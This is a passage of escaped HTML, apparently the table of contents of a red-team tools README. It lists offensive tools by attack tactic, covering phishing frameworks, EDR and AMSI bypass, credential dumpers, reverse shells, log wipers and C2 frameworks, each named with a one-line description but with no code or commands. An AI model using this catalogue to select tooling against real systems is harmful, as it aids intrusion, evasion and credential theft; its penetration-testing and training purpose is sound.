href=\"#spiderfoot\"\u003espiderfoot\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Automated OSINT and attack surface mapping\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#reconftw\"\u003ereconftw\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Automated subdomain and vulnerability recon tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#subzy\"\u003esubzy\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Subdomain takeover vulnerability checker\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#smtp-user-enum\"\u003esmtp-user-enum\u003c/a\u003e\u003c/b\u003e\u003ci\u003e SMTP user enumeration\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#crtsh---httprobe---eyewitness\"\u003ecrt.sh -\u0026gt; httprobe -\u0026gt; EyeWitness\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Automated domain screenshotting\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#jsendpoints\"\u003ejsendpoints\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Extract page DOM links\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#nuclei\"\u003enuclei\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Vulnerability scanner\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#certsniff\"\u003ecertSniff\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Certificate transparency log keyword sniffer\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#gobuster\"\u003egobuster\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Website path brute force\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#feroxbuster\"\u003eferoxbuster\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Fast content discovery tool written in Rust\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#cloudbrute\"\u003eCloudBrute\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Cloud infrastructure brute force\u003c/i\u003e\u003c/li\u003e\n 
\u003cli\u003e\u003cb\u003e\u003ca href=\"#dnsrecon\"\u003ednsrecon\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Enumerate DNS records\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#shodanio\"\u003eShodan.io\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Public facing system knowledge base\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#aort\"\u003eAORT (All in One Recon Tool)\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Subdomain enumeration\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#spoofcheck\"\u003espoofcheck\u003c/a\u003e\u003c/b\u003e\u003ci\u003e SPF/DMARC record checker\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#awsbucketdump\"\u003eAWSBucketDump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e S3 bucket enumeration\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#githarvester\"\u003eGitHarvester\u003c/a\u003e\u003c/b\u003e\u003ci\u003e GitHub credential searcher\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#trufflehog\"\u003etruffleHog\u003c/a\u003e\u003c/b\u003e\u003ci\u003e GitHub credential scanner\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#dismap\"\u003eDismap\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Asset discovery/identification\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#enum4linux\"\u003eenum4linux\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows/samba enumeration\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#skanuvaty\"\u003eskanuvaty\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Dangerously fast dns/network/port scanner\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#metabigor\"\u003eMetabigor\u003c/a\u003e\u003c/b\u003e\u003ci\u003e OSINT tool without API\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#gitrob\"\u003eGitrob\u003c/a\u003e\u003c/b\u003e\u003ci\u003e 
GitHub sensitive information scanner\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#gowitness\"\u003egowitness\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Web screenshot utility using Chrome Headless\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eResource Development\u003c/b\u003e 12 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#remoteinjector\"\u003eremoteinjector\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Inject remote template link into Word document\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#chimera\"\u003eChimera\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell obfuscation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#msfvenom\"\u003emsfvenom\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Payload creation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#shellter\"\u003eShellter\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Dynamic shellcode injection tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#freeze\"\u003eFreeze\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Payload creation (circumventing EDR)\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#wordsteal\"\u003eWordSteal\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Steal NTLM hashes with Microsoft Word\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#ntapi-undocumented-functions\"\u003eNTAPI Undocumented Functions\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows NT Kernel, Native API and drivers\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#kernel-callback-functions\"\u003eKernel Callback Functions\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Undocumented Windows APIs\u003c/i\u003e\u003c/li\u003e\n 
\u003cli\u003e\u003cb\u003e\u003ca href=\"#offensivevba\"\u003eOffensiveVBA\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Office macro code execution and evasion techniques\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#wsh\"\u003eWSH\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Wsh payload\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#hta\"\u003eHTA\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Hta payload\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#vba\"\u003eVBA\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Vba payload\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eInitial Access\u003c/b\u003e 10 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#credmaster\"\u003eCredMaster\u003c/a\u003e\u003c/b\u003e\u003ci\u003e CredKing password spraying tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#trevorspray\"\u003eTREVORspray\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Password sprayer with threading\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#evilqr\"\u003eevilqr\u003c/a\u003e\u003c/b\u003e\u003ci\u003e QRLJacking phishing PoC\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#cupp\"\u003eCUPP\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Common User Passwords Profiler (CUPP)\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#bash-bunny\"\u003eBash Bunny\u003c/a\u003e\u003c/b\u003e\u003ci\u003e USB attack tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#evilgophish\"\u003eEvilGoPhish\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Phishing campaign framework\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#social-engineer-toolkit-set\"\u003eThe Social-Engineer 
Toolkit\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Phishing campaign framework\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#hydra\"\u003eHydra\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Brute force tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#squarephish\"\u003eSquarePhish\u003c/a\u003e\u003c/b\u003e\u003ci\u003e OAuth/QR code phishing framework\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#king-phisher\"\u003eKing Phisher\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Phishing campaign framework\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eExecution\u003c/b\u003e 13 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#responder\"\u003eResponder\u003c/a\u003e\u003c/b\u003e\u003ci\u003e LLMNR, NBT-NS and MDNS poisoner\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#secretsdump\"\u003esecretsdump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Remote hash dumper\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#evil-winrm\"\u003eevil-winrm\u003c/a\u003e\u003c/b\u003e\u003ci\u003e WinRM shell\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#donut\"\u003eDonut\u003c/a\u003e\u003c/b\u003e\u003ci\u003e In-memory .NET execution\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#macro_pack\"\u003eMacro_pack\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Macro obfuscation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#powersploit\"\u003ePowerSploit\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell script suite\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#rubeus\"\u003eRubeus\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory hack tool\u003c/i\u003e\u003c/li\u003e\n 
\u003cli\u003e\u003cb\u003e\u003ca href=\"#sharpup\"\u003eSharpUp\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows vulnerability identifier\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sqlrecon\"\u003eSQLRecon\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Offensive MS-SQL toolkit\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#ultimateapplockerbypasslist\"\u003eUltimateAppLockerByPassList\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Common AppLocker Bypass Techniques\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#starfighters\"\u003eStarFighters\u003c/a\u003e\u003c/b\u003e\u003ci\u003e JavaScript and VBScript Based Empire Launcher\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#demiguise\"\u003edemiguise\u003c/a\u003e\u003c/b\u003e\u003ci\u003e HTA encryption tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#powerzure\"\u003ePowerZure\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell framework to assess Azure security\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003ePersistence\u003c/b\u003e 4 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#impacket\"\u003eImpacket\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Python script suite\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#empire\"\u003eEmpire\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Post-exploitation framework\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sharpersist\"\u003eSharPersist\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows persistence toolkit\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#ligolo-ng\"\u003eligolo-ng\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Tunneling tool that uses a TUN 
interface\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003ePrivilege Escalation\u003c/b\u003e 11 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#crassus\"\u003eCrassus\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows privilege escalation discovery tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#linpeas\"\u003eLinPEAS\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Linux privilege escalation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#winpeas\"\u003eWinPEAS\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows privilege escalation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#linux-smart-enumeration\"\u003elinux-smart-enumeration\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Linux privilege escalation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#certify\"\u003eCertify\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory privilege escalation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#get-gpppassword\"\u003eGet-GPPPassword\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows password extraction\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sherlock\"\u003eSherlock\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell privilege escalation tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#watson\"\u003eWatson\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows privilege escalation tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#impulsivedllhijack\"\u003eImpulsiveDLLHijack\u003c/a\u003e\u003c/b\u003e\u003ci\u003e DLL Hijack tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#adfsdump\"\u003eADFSDump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e AD FS dump 
tool\u003c/i\u003e\u003c/li\u003e \n \u003cli\u003e\u003cb\u003e\u003ca href=\"#beroot\"\u003eBeRoot\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Multi OS Privilege Escalation Project\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eDefense Evasion\u003c/b\u003e 8 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#invoke-obfuscation\"\u003eInvoke-Obfuscation\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Script obfuscator\u003c/i\u003e\u003c/li\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#veil\"\u003eVeil\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Metasploit payload obfuscator\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sharpblock\"\u003eSharpBlock\u003c/a\u003e\u003c/b\u003e\u003ci\u003e EDR bypass via entry point execution prevention\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#alcatraz\"\u003eAlcatraz\u003c/a\u003e\u003c/b\u003e\u003ci\u003e GUI x64 binary obfuscator\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#mangle\"\u003eMangle\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Compiled executable manipulation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#amsi-fail\"\u003eAMSI Fail\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell snippets that break or disable AMSI\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#scarecrow\"\u003eScareCrow\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Payload creation framework designed around EDR bypass\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#moonwalk\"\u003emoonwalk\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Linux system log and filesystem timestamp remover\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n 
\u003csummary\u003e\u003cb\u003eCredential Access\u003c/b\u003e 11 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#mimikatz\"\u003eMimikatz\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows credential extractor\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#lazagne\"\u003eLaZagne\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Local password extractor\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#hashcat\"\u003ehashcat\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Password hash cracking\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#john-the-ripper\"\u003eJohn the Ripper\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Password hash cracking\u003c/i\u003e\u003c/li\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#scomdecrypt\"\u003eSCOMDecrypt\u003c/a\u003e\u003c/b\u003e\u003ci\u003e SCOM Credential Decryption Tool\u003c/i\u003e\u003c/li\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#nanodump\"\u003enanodump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e LSASS process minidump creation\u003c/i\u003e\u003c/li\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#eviltree\"\u003eeviltree\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Tree remake for credential discovery\u003c/i\u003e\u003c/li\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#seeyoucm-thief\"\u003eSeeYouCM-Thief\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Cisco phone systems configuration file parsing\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#mailsniper\"\u003eMailSniper\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Microsoft Exchange Mail Searcher\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sharpchromium\"\u003eSharpChromium\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Cookie, history and saved login chromium extractor\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca 
href=\"#dploot\"\u003edploot\u003c/a\u003e\u003c/b\u003e\u003ci\u003e DPAPI looting remotely in Python\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eDiscovery\u003c/b\u003e 6 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#pcredz\"\u003ePCredz\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Credential discovery PCAP/live interface\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#pingcastle\"\u003ePingCastle\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory assessor\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#seatbelt\"\u003eSeatbelt\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Local vulnerability scanner\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#adrecon\"\u003eADRecon\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory recon\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#adidnsdump\"\u003eadidnsdump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active Directory Integrated DNS dumping\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#scavenger\"\u003escavenger\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Scanning tool for scavenging systems\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eLateral Movement\u003c/b\u003e 12 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#crackmapexec\"\u003ecrackmapexec\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows/Active directory lateral movement toolkit\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#wmiops\"\u003eWMIOps\u003c/a\u003e\u003c/b\u003e\u003ci\u003e WMI remote 
commands\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#powerlessshell\"\u003ePowerLessShell\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Remote PowerShell without PowerShell\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#psexec\"\u003ePsExec\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Light-weight telnet-replacement\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#liquidsnake\"\u003eLiquidSnake\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Fileless lateral movement\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#enabling-rdp\"\u003eEnabling RDP\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows RDP enable command\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#upgrading-shell-to-meterpreter\"\u003eUpgrading shell to meterpreter\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Reverse shell improvement\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#forwarding-ports\"\u003eForwarding Ports\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Local port forward command\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#jenkins-reverse-shell\"\u003eJenkins reverse shell\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Jenkins shell command\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#adfspoof\"\u003eADFSpoof\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Forge AD FS security tokens\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#kerbrute\"\u003ekerbrute\u003c/a\u003e\u003c/b\u003e\u003ci\u003e A tool to perform Kerberos pre-auth bruteforcing\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#coercer\"\u003eCoercer\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Coerce a Windows server to authenticate\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#wmiops\"\u003eWMIOps\u003c/a\u003e\u003c/b\u003e\u003ci\u003e WMI remote 
commands\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eCollection\u003c/b\u003e 3 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#bloodhound\"\u003eBloodHound\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory visualisation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#snaffler\"\u003eSnaffler\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory credential collector\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#linwinpwn\"\u003elinWinPwn\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active Directory Enumeration and Vulnerability checks\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eCommand and Control\u003c/b\u003e 9 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#living-off-trusted-sites-project\"\u003eLiving Off Trusted Sites Project\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Leverage legitimate domains for your C2\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#havoc\"\u003eHavoc\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#covenant\"\u003eCovenant\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework (.NET)\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#merlin\"\u003eMerlin\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework (Golang)\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#metasploit-framework\"\u003eMetasploit Framework\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework 
(Ruby)\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#pupy\"\u003ePupy\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework (Python)\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#brute-ratel\"\u003eBrute Ratel\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework ($$$)\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#nimplant\"\u003eNimPlant\u003c/a\u003e\u003c/b\u003e\u003ci\u003e C2 implant written in Nim\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#hoaxshell\"\u003eHoaxshell\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell reverse shell\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails 